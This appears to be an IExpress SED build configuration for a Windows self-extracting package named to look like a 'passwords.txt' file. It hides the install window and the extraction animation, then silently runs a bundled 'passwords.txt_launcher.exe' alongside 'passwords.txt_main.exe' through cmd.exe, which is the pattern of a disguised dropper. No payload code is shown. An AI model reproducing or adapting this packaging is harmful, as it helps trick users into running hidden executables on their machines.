[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=%TargetName%
FriendlyName=passwords.txt
AppLaunched=cmd.exe /c passwords.txt_launcher.exe
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
SourceFiles=SourceFiles0
[Strings]
[SourceFiles]
SourceFiles0=%SourceFiles0%
[SourceFiles0]
passwords.txt_launcher.exe=
passwords.txt_main.exe=

